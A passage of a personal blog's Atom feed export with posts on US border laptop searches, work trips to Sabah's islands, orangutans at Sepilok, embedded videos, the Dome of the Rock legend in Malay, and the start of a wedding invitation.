cleaned of any sensitive information. Then, after passing through customs, travelers can download the data they need, work on it, transmit it back and then digitally destroy the files before returning.&lt;br /&gt;&lt;br /&gt;The post also urges the use of strong encryption to scramble sensitive data, although it warns this approach is by no means perfect. For one thing, CBP agents are free to deny entry to travelers who refuse to divulge their passwords. They may also be able to seize the laptop.&lt;br /&gt;&lt;br /&gt;SOURCE: &lt;a href="http://www.theregister.co.uk/2008/05/01/electronic_searches_at_us_borders/"&gt;The Register&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2442562884259505727?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2442562884259505727/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2442562884259505727' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2442562884259505727'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2442562884259505727'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/05/us-owns-your-data.html' title='US OWNS YOUR DATA!'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4367469319735314490</id><published>2008-02-18T09:43:00.019+08:00</published><updated>2008-11-07T10:00:08.117+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>WOW! Sabah is very wonderful and amazing place.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jjFURnU9I/AAAAAAAAAQw/ezCSgrn06Cc/s1600-h/S4021200.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jjFURnU9I/AAAAAAAAAQw/ezCSgrn06Cc/s200/S4021200.JPG" alt="" id="BLOGGER_PHOTO_ID_5168130252889084882" border="0" /&gt;&lt;/a&gt;&lt;b&gt;Sabah&lt;/b&gt; is a &lt;a href="http://en.wikipedia.org/wiki/Malaysia" title="Malaysia"&gt;Malaysian&lt;/a&gt; state located on the northern portion of the island of &lt;a href="http://en.wikipedia.org/wiki/Borneo" title="Borneo"&gt;Borneo&lt;/a&gt;. It is the second largest state in Malaysia after &lt;a href="http://en.wikipedia.org/wiki/Sarawak" title="Sarawak"&gt;Sarawak&lt;/a&gt;, which it borders with on its south-west. It also shares a border with the province of &lt;a href="http://en.wikipedia.org/wiki/East_Kalimantan" title="East Kalimantan"&gt;East Kalimantan&lt;/a&gt; of &lt;a href="http://en.wikipedia.org/wiki/Indonesia" title="Indonesia"&gt;Indonesia&lt;/a&gt; in the south. Sabah used to be a &lt;a href="http://en.wikipedia.org/wiki/British_overseas_territories" title="British overseas territories"&gt;British crown colony&lt;/a&gt; known as &lt;a href="http://en.wikipedia.org/wiki/North_Borneo" title="North Borneo"&gt;North Borneo&lt;/a&gt; prior to partnership with &lt;a href="http://en.wikipedia.org/wiki/Federation_of_Malaya" title="Federation of Malaya"&gt;Federation of Malaya&lt;/a&gt;, Sarawak and &lt;a href="http://en.wikipedia.org/wiki/Singapore" title="Singapore"&gt;Singapore&lt;/a&gt; to form the Federation of Malaysia in 1963. Its state capital is &lt;a href="http://en.wikipedia.org/wiki/Kota_Kinabalu" title="Kota Kinabalu"&gt;Kota Kinabalu&lt;/a&gt;, formerly known as &lt;a href="http://en.wikipedia.org/wiki/Jesselton" class="mw-redirect" title="Jesselton"&gt;Jesselton&lt;/a&gt;. Sabah is known as &lt;i&gt;Sabah, negeri di bawah bayu&lt;/i&gt;, which means 'Sabah, land below the wind', because of its location being just south of the typhoon prone region around the &lt;a href="http://en.wikipedia.org/wiki/Philippines" title="Philippines"&gt;Philippines&lt;/a&gt;.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/R7jlJkRnU-I/AAAAAAAAAQ4/lM2jstxOpEg/s1600-h/S4021222.JPG"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/R7jlJkRnU-I/AAAAAAAAAQ4/lM2jstxOpEg/s200/S4021222.JPG" alt="" id="BLOGGER_PHOTO_ID_5168132524926784482" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;I'm now often travel to Sabah for work. I can say that I travel to Sabah once a week. This time I visited ten (10) islands. Sounds like fun huh? Oh yeah! It is fun! So much fun! Really amaaazziinnggg places! &lt;a href="http://en.wikipedia.org/wiki/Kapalai"&gt;Kapalai&lt;/a&gt; Island and &lt;a href="http://en.wikipedia.org/wiki/Sipadan"&gt;Sipadan&lt;/a&gt; Island is the most spectacular and amazing place that I visited. I suggest if you plan to visit Sabah for holiday you better go to Kapalai Resort. In Kapalai there is one place that you can enjoy sunset. If you only knew how I feel :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jntURnVAI/AAAAAAAAARI/wNccMVqkEvs/s1600-h/S4021274.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jntURnVAI/AAAAAAAAARI/wNccMVqkEvs/s200/S4021274.JPG" alt="" id="BLOGGER_PHOTO_ID_5168135338130363394" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jn5URnVBI/AAAAAAAAARQ/4qSQB9_0Xv4/s1600-h/S4021270.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jn5URnVBI/AAAAAAAAARQ/4qSQB9_0Xv4/s200/S4021270.JPG" alt="" id="BLOGGER_PHOTO_ID_5168135544288793618" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7joIURnVCI/AAAAAAAAARY/Q0Mt_KmCLbI/s1600-h/S4021277.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7joIURnVCI/AAAAAAAAARY/Q0Mt_KmCLbI/s200/S4021277.JPG" alt="" id="BLOGGER_PHOTO_ID_5168135801986831394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jp1URnVEI/AAAAAAAAARo/t2p4cJKvv5U/s1600-h/S4021263.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jp1URnVEI/AAAAAAAAARo/t2p4cJKvv5U/s200/S4021263.JPG" alt="" id="BLOGGER_PHOTO_ID_5168137674592572482" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqKURnVGI/AAAAAAAAAR4/sGad-wWLjE0/s1600-h/S4021269.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqKURnVGI/AAAAAAAAAR4/sGad-wWLjE0/s200/S4021269.JPG" alt="" id="BLOGGER_PHOTO_ID_5168138035369825378" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqVURnVHI/AAAAAAAAASA/prfeCJXIeS8/s1600-h/S4021268.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqVURnVHI/AAAAAAAAASA/prfeCJXIeS8/s200/S4021268.JPG" alt="" id="BLOGGER_PHOTO_ID_5168138224348386418" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqoURnVJI/AAAAAAAAASQ/FJSDVcg7ue4/s1600-h/S4021278.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqoURnVJI/AAAAAAAAASQ/FJSDVcg7ue4/s200/S4021278.JPG" alt="" id="BLOGGER_PHOTO_ID_5168138550765900946" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqyURnVKI/AAAAAAAAASY/v_A1kjj4490/s1600-h/Kapalai_Accommodation.jpg"&gt;&lt;img style="cursor: pointer; width: 199px; height: 149px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jqyURnVKI/AAAAAAAAASY/v_A1kjj4490/s200/Kapalai_Accommodation.jpg" alt="" id="BLOGGER_PHOTO_ID_5168138722564592802" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/R7jrAERnVLI/AAAAAAAAASg/FiPqRa5byEw/s1600-h/bot.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/R7jrAERnVLI/AAAAAAAAASg/FiPqRa5byEw/s200/bot.JPG" alt="" id="BLOGGER_PHOTO_ID_5168138958787794098" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I have thank to the military for their co-operation and hospitality during my visits. Without them I will never feel so secured traveling from one island to another. Additionally, they provide me a food whenever I arrived to each islands. They are doing a good job on our border. Thank You a lot!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4367469319735314490?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4367469319735314490/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4367469319735314490' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4367469319735314490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4367469319735314490'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/02/wow-sabah-is-very-wonderful-and-amazing.html' title='WOW! Sabah is very wonderful and amazing place.'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/R7jjFURnU9I/AAAAAAAAAQw/ezCSgrn06Cc/s72-c/S4021200.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2941411366190056329</id><published>2008-02-10T13:31:00.001+08:00</published><updated>2008-02-10T13:31:48.624+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Penglipur Lara'/><title type='text'>The Comedy King Dax</title><content type='html'>&lt;embed style="width:400px; height:326px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=-4604360870333886926&amp;hl=en" flashvars=""&gt; &lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2941411366190056329?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2941411366190056329/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2941411366190056329' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2941411366190056329'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2941411366190056329'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/02/comedy-king-dax.html' title='The Comedy King Dax'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5328852382975462844</id><published>2008-01-10T14:47:00.000+08:00</published><updated>2008-01-10T15:02:26.331+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Sabah Trip</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.poster.net/flach-tim/flach-tim-orang-utan-2108018.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 148px; height: 197px;" src="http://www.poster.net/flach-tim/flach-tim-orang-utan-2108018.jpg" alt="" border="0" /&gt;&lt;/a&gt;Last week I was travelling to Sandakan and Tawau for a business trip. During my trip, I was lucky to had opportunity to visits &lt;a href="http://www.sepilok.com/index.html"&gt;Sepilok&lt;/a&gt;, one of the biggest '&lt;a href="http://en.wikipedia.org/wiki/Orang_utan"&gt;Orang Utan&lt;/a&gt;' territory.&lt;br /&gt;&lt;br /&gt;The Orangutan are the two &lt;a href="http://en.wikipedia.org/wiki/Species" title="Species"&gt;species&lt;/a&gt; of &lt;a href="http://en.wikipedia.org/wiki/Hominidae" title="Hominidae"&gt;great apes&lt;/a&gt; known for their intelligence, long arms and reddish-brown hair. Native to &lt;a href="http://en.wikipedia.org/wiki/Indonesia" title="Indonesia"&gt;Indonesia&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Malaysia" title="Malaysia"&gt;Malaysia&lt;/a&gt;, they are currently found only in &lt;a href="http://en.wikipedia.org/wiki/Rainforest" title="Rainforest"&gt;rainforests&lt;/a&gt; on the islands of &lt;a href="http://en.wikipedia.org/wiki/Borneo" title="Borneo"&gt;Borneo&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Sumatra" title="Sumatra"&gt;Sumatra&lt;/a&gt;, though fossils have been found in &lt;a href="http://en.wikipedia.org/wiki/Java" title="Java"&gt;Java&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Vietnam" title="Vietnam"&gt;Vietnam&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/China" title="China"&gt;China&lt;/a&gt;. They are the only surviving species in the genus &lt;i&gt;Pongo&lt;/i&gt; and the subfamily &lt;i&gt;Ponginae&lt;/i&gt; (which also includes the extinct genera &lt;i&gt;&lt;a href="http://en.wikipedia.org/wiki/Gigantopithecus" title="Gigantopithecus"&gt;Gigantopithecus&lt;/a&gt;&lt;/i&gt; and &lt;i&gt;&lt;a href="http://en.wikipedia.org/wiki/Sivapithecus" title="Sivapithecus"&gt;Sivapithecus&lt;/a&gt;&lt;/i&gt;). Their name derives from the &lt;a href="http://en.wikipedia.org/wiki/Malay_language" title="Malay language"&gt;Malay&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Indonesian_language" title="Indonesian language"&gt;Indonesian&lt;/a&gt; phrase &lt;i&gt;orang hutan&lt;/i&gt;, meaning "person of the forest".&lt;br /&gt;&lt;br /&gt;Orangutans are the most &lt;a href="http://en.wikipedia.org/wiki/Arboreal" title="Arboreal"&gt;arboreal&lt;/a&gt; of the great apes, spending nearly all of their time in the trees. Every night they fashion nests, in which they sleep, from branches and foliage. They are more solitary than the other apes, with males and females generally coming together only to mate. Mothers stay with their babies until the offspring reach an age of six or seven years. There is significant &lt;a href="http://en.wikipedia.org/wiki/Sexual_dimorphism" title="Sexual dimorphism"&gt;sexual dimorphism&lt;/a&gt; between females and males: females can grow to around 4 ft 2 in or 127 centimetres and weigh around 100 lbs or 45 kg, while fully mature males can reach 5 ft 9 in or 175 centimetres in height and weigh over 260 lbs or 118 kg.&lt;sup id="_ref-4" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Orang_utan#_note-4" title=""&gt;[7]&lt;/a&gt;&lt;/sup&gt; Fully mature males can be distinguished by their prominent cheek flanges and longer hair.&lt;br /&gt;&lt;br /&gt;I really recommended Sepilok to be one of your visiting place when you come for holiday to Sabah.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5328852382975462844?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5328852382975462844/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5328852382975462844' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5328852382975462844'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5328852382975462844'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/01/sabah-trip.html' title='Sabah Trip'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4000955242518932196</id><published>2007-12-27T12:36:00.001+08:00</published><updated>2007-12-27T12:45:27.441+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>BUSY</title><content type='html'>Had a very very very long ddddaaayyyyyyyyyyyy&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4000955242518932196?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4000955242518932196/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4000955242518932196' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4000955242518932196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4000955242518932196'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2007/12/busy.html' title='BUSY'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3945021460547251306</id><published>2007-12-13T17:57:00.000+08:00</published><updated>2007-12-13T17:59:21.539+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Tarian Bajau - IGAL IGAL</title><content type='html'>Persembahan oleh anak-anak buah aku di malam persandingan di Tawau, Sabah.&lt;br /&gt;&lt;embed style="width: 400px; height: 326px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=5800780615646880786&amp;amp;hl=en" flashvars=""&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3945021460547251306?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3945021460547251306/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3945021460547251306' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3945021460547251306'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3945021460547251306'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2007/12/tarian-bajau-igal-igal.html' title='Tarian Bajau - IGAL IGAL'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-8382204652519839091</id><published>2007-11-21T12:45:00.000+08:00</published><updated>2007-11-21T12:53:11.030+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>Simply Pelaut</title><content type='html'>"Only God knows" what is really hidden and abstract messages in this video.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/rf5cMQ9rUJk&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/rf5cMQ9rUJk&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-8382204652519839091?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/8382204652519839091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=8382204652519839091' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8382204652519839091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8382204652519839091'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2007/11/simply-pelaut.html' title='Simply Pelaut'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-988191475729416482</id><published>2007-11-19T12:46:00.000+08:00</published><updated>2008-11-07T10:00:12.275+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>The Dome of Rock - Batu Bergantung</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/R0EVmtFf6oI/AAAAAAAAAOI/7-M2Fd6G_ZE/s1600-h/batubergantung.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 149px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/R0EVmtFf6oI/AAAAAAAAAOI/7-M2Fd6G_ZE/s320/batubergantung.JPG" alt="" id="BLOGGER_PHOTO_ID_5134408804860947074" border="0" /&gt;&lt;/a&gt;Batu bergantung disebut dalam bahasa Arab sebagai &lt;em&gt;Kubbah As-Shakra&lt;/em&gt;  dan dalam bahasa Inggeris &lt;em&gt;The Dome of The Rock.&lt;/em&gt; Ada cerita-cerita yang mengatakan bahawa batu ini terangkat ke atas ketika Rasulullah melepaskan kaki Baginda dari batu ini untuk melakukan &lt;a href="http://ms.wikipedia.org/wiki/Isra_dan_Mi%27raj"&gt;mikraj&lt;/a&gt; ke &lt;a href="http://id.wikipedia.org/wiki/Sidratul_Muntaha"&gt;&lt;em&gt;Sidratul Muntaha&lt;/em&gt;&lt;/a&gt;. Batu ini dikatakan ingin mengikut Rasulullah waktu mikraj tetapi ditahan oleh malaikat &lt;a href="http://ms.wikipedia.org/wiki/Jibril"&gt;Jibril&lt;/a&gt;. Bekas tapak tangan Jibril dikatakan masih ada dan dinamakan &lt;em&gt;&lt;span style="font-weight: bold;"&gt;Kafaf Sayyidina Jibril&lt;/span&gt;. &lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Bagaimana pun, menurut Sayyid Muhammad bin Alwi Al-Maliki, ulama Masjidil Haram di Makkah, mereka yang berkata bahawa batu ini bergantung di antara langit dan bumi adalah tidak benar kerana kisah ini tidak tersebut dalam alQuran atau dalil-dalil yang kuat.&lt;br /&gt;&lt;br /&gt;Batu ini panjangnya 56 kaki dan lebarnya 42 kaki dan berbentuk hampir separuh bulatan. Di tengah-tengah batu ini terdapat satu lubang yang turun ke bawah menuju ke sebuah gua kecil.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-988191475729416482?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/988191475729416482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=988191475729416482' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/988191475729416482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/988191475729416482'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2007/11/dome-of-rock-batu-bergantung.html' title='The Dome of Rock - Batu Bergantung'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/R0EVmtFf6oI/AAAAAAAAAOI/7-M2Fd6G_ZE/s72-c/batubergantung.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2601964053701934312</id><published>2007-10-30T15:19:00.000+08:00</published><updated>2007-11-19T12:52:29.907+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Utusan Raja Sehari</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.malaysianmonarchy.org.my/portal_bm/rk7/photo/img_singgahsana_2.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 149px;" src="http://www.malaysianmonarchy.org.my/portal_bm/rk7/photo/img_singgahsana_2.gif" alt="" border="0" /&gt;&lt;/a&gt;BISMILLAAHIR RAHMAANIR RAHIIM,&lt;br /&gt;ASSALAMU ALAIKUM WARAHMATULLAAHI WABARAKAATUH.&lt;br /&gt;&lt;br /&gt;TanSri/PuanSri, Dato/Datin, Rakan Taulan, Tuan/Puan, dan Encik/Cik&lt;br /&gt;&lt;br /&gt;Alhamdulillah, syukur ke hadrat Allah Subhanahu Wata'ala, kerana dengan limpah kurnia dan izinNya akan bersatulah dua jiwa pada &lt;span style="font-weight: bold;"&gt;28 Shawwal, 1428&lt;/span&gt; hijrah bersamaan &lt;span style="font-weight: bold;"&gt;9 November, 2007&lt;/span&gt; ini.&lt;br /&gt;&lt;br /&gt;2. Dengan ini, TanSri/PuanSri, Dato/Datin, Rakan Taulan,&lt;br /&gt;Tuan/Puan dan Encik/Cik di jemput hadir ke majlis &lt;span style="font-weight: bold;"&gt;Raja Sehari &lt;/span&gt;pada &lt;span style="font-weight: bold;"&gt;10/11/2007 &lt;/span&gt;bertempat di &lt;span style="font-weight: bold;"&gt;No. 12, Lorong Inai 5/1, Taman Setar, Alor Setar, Kedah Darul &lt;/span&gt;&lt;span style="font-weight: 